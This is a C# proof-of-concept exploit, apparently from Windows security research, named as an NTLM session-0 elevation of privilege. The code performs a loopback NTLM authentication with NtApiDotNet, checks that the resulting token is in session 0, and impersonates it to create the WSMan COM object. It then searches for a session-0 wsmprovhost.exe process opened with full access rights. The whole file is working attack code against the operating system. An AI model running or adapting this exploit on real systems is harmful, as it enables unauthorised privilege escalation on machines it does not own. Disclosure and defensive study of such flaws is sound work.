﻿using NtApiDotNet;
using System;
using System.ComponentModel;

namespace PoC_NtlmAuthSession0_EoP
{
    class Program
    {
        [MTAThread]
        static void Main(string[] args)
        {
            try
            {
                using (var list = new DisposableList())
                {
                    var creds = list.AddResource(new CredentialsHandle("NTLM", SecPkgCredFlag.BOTH,
                    Environment.UserName, Environment.UserDomainName, null));
                    var client_ctx = list.AddResource(new ClientContext(creds, 0, Environment.MachineName));
                    var server_ctx = list.AddResource(new ServerContext(creds, client_ctx.Token));

                    while (!client_ctx.Done && !server_ctx.Done)
                    {
                        client_ctx.Continue(server_ctx.Token);
                        server_ctx.Continue(client_ctx.Token);
                    }

                    using (var token = server_ctx.GetAccessToken())
                    {
                        Console.WriteLine("Got token for user {0}", token.User.Sid.Name);
                        Console.WriteLine("Session ID {0}", token.SessionId);
                        if (token.SessionId != 0)
                        {
                            throw new Exception("Access token not in session 0");
                        }

                        Guid IID_IUnknown = new Guid("{00000000-0000-0000-C000-000000000046}");
                        Guid CLSID_WSM = new Guid("9678f47f-2435-475c-b24a-4606f8161c16");

                        object pUnk = null;
                        using (var imp = token.Impersonate(SecurityImpersonationLevel.Impersonation))
                        {
                            int hr = Win32NativeMethods.CoCreateInstance(
                                ref CLSID_WSM, IntPtr.Zero,
                                CLSCTX.LOCAL_SERVER | CLSCTX.ENABLE_CLOAKING,
                                ref IID_IUnknown, out pUnk);
                            if (hr < 0)
                            {
                                throw new Win32Exception(hr);
                            }
                        }

                        Console.WriteLine("Created COM instance {0}", pUnk);

                        using (var procs = NtProcess.GetProcesses(ProcessAccessRights.AllAccess, true).ToDisposableList())
                        {
                            foreach (var proc in procs)
                            {
                                if (proc.SessionId == 0 && proc.Name.Equals("wsmprovhost.exe", StringComparison.OrdinalIgnoreCase))
                                {
                                    
                                    Console.WriteLine("Found session 0 process owned by {0} - PID {1}", proc.User.Name, proc.ProcessId);
                                    Console.ReadLine();
                                }
                            }
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
